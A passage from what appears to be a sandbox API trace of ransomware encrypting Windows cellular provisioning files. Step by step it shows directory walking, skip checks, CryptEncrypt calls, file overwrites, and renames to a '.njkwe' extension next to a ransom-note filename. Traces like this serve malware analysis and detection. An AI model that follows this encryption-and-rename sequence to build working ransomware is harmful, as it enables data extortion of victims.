(Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.233] lstrcmpiW (lpString1="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.233] lstrcmpiW (lpString1="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.233] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml") returned 160 [0078.233] StrStrIW (lpFirst="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.233] lstrcmpW (lpString1="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.233] lstrcmpW (lpString1="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.233] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\317__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.233] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\317__connections_cellular_ufone (pakistan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.234] GetTickCount () returned 0x1153e3e [0078.234] GetTickCount () returned 0x1153e3e [0078.234] GetTickCount () returned 0x1153e3e [0078.234] GetTickCount () returned 0x1153e3e [0078.234] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.234] GetProcessHeap () returned 0xbe0000 [0078.234] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.234] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x288, lpOverlapped=0x0) returned 1 [0078.236] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.236] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x288, lpOverlapped=0x0) returned 1 [0078.236] GetProcessHeap () returned 0xbe0000 [0078.236] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.236] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.236] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.236] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.236] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.236] CloseHandle (hObject=0x43c) returned 1 [0078.236] GetProcessHeap () returned 0xbe0000 [0078.236] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.236] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\317__connections_cellular_ufone (pakistan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\317__connections_cellular_ufone (pakistan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.237] GetProcessHeap () returned 0xbe0000 [0078.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.237] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bd19f0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bd19f0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bd19f0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x290, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="318__C~1.PRO")) returned 1 [0078.237] lstrcmpiW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.237] lstrcmpiW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.237] lstrcmpiW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.237] lstrcmpiW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.237] lstrcmpiW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.237] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml") returned 168 [0078.237] StrStrIW (lpFirst="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.237] lstrcmpW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.237] lstrcmpW (lpString1="318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.237] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\318__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.237] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\318__connections_cellular_warid telecom (pakistan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.238] GetTickCount () returned 0x1153e3e [0078.238] GetTickCount () returned 0x1153e3e [0078.238] GetTickCount () returned 0x1153e3e [0078.238] GetTickCount () returned 0x1153e3e [0078.238] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.238] GetProcessHeap () returned 0xbe0000 [0078.238] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.238] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x290, lpOverlapped=0x0) returned 1 [0078.239] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.239] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x290, lpOverlapped=0x0) returned 1 [0078.239] GetProcessHeap () returned 0xbe0000 [0078.240] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.240] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.240] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.240] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.240] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.240] CloseHandle (hObject=0x43c) returned 1 [0078.240] GetProcessHeap () returned 0xbe0000 [0078.240] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.240] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0078.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\318__connections_cellular_warid telecom (pakistan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\318__Connections_Cellular_Warid Telecom (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\318__connections_cellular_warid telecom (pakistan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.241] GetProcessHeap () returned 0xbe0000 [0078.241] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.241] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bd19f0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bd19f0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bd19f0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", cAlternateFileName="319__C~1.PRO")) returned 1 [0078.241] lstrcmpiW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.241] lstrcmpiW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.241] lstrcmpiW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.241] lstrcmpiW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.241] lstrcmpiW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.241] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml") returned 176 [0078.241] StrStrIW (lpFirst="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.241] lstrcmpW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.241] lstrcmpW (lpString1="319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.241] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\319__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\319__connections_cellular_aljawwal (palestinian authority)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.241] GetTickCount () returned 0x1153e3e [0078.241] GetTickCount () returned 0x1153e3e [0078.241] GetTickCount () returned 0x1153e3e [0078.241] GetTickCount () returned 0x1153e3e [0078.241] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.242] GetProcessHeap () returned 0xbe0000 [0078.242] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.242] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1f2, lpOverlapped=0x0) returned 1 [0078.243] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.243] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1f2, lpOverlapped=0x0) returned 1 [0078.243] GetProcessHeap () returned 0xbe0000 [0078.243] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.243] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.243] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.243] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.243] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.244] CloseHandle (hObject=0x43c) returned 1 [0078.244] GetProcessHeap () returned 0xbe0000 [0078.244] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.244] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 196 [0078.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\319__connections_cellular_aljawwal (palestinian authority)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\319__Connections_Cellular_Aljawwal (Palestinian Authority)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\319__connections_cellular_aljawwal (palestinian authority)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.244] GetProcessHeap () returned 0xbe0000 [0078.244] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.244] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901d57cf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901d57cf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901d57cf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x363, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="31__CO~1.PRO")) returned 1 [0078.244] lstrcmpiW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.244] lstrcmpiW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.244] lstrcmpiW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.245] lstrcmpiW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.245] lstrcmpiW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.245] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml") returned 165 [0078.245] StrStrIW (lpFirst="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.245] lstrcmpW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.245] lstrcmpW (lpString1="31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.245] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\31__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.245] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\31__connections_cellular_t-mobile m2m (austria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.245] GetTickCount () returned 0x1153e3e [0078.245] GetTickCount () returned 0x1153e3e [0078.245] GetTickCount () returned 0x1153e3e [0078.245] GetTickCount () returned 0x1153e3e [0078.245] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.245] GetProcessHeap () returned 0xbe0000 [0078.245] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.245] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x363, lpOverlapped=0x0) returned 1 [0078.253] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.253] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x363, lpOverlapped=0x0) returned 1 [0078.253] GetProcessHeap () returned 0xbe0000 [0078.253] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.253] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.253] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.253] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.254] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.254] CloseHandle (hObject=0x43c) returned 1 [0078.254] GetProcessHeap () returned 0xbe0000 [0078.254] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.254] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\31__connections_cellular_t-mobile m2m (austria)_i0$(__mvid)@wap.provxml"), 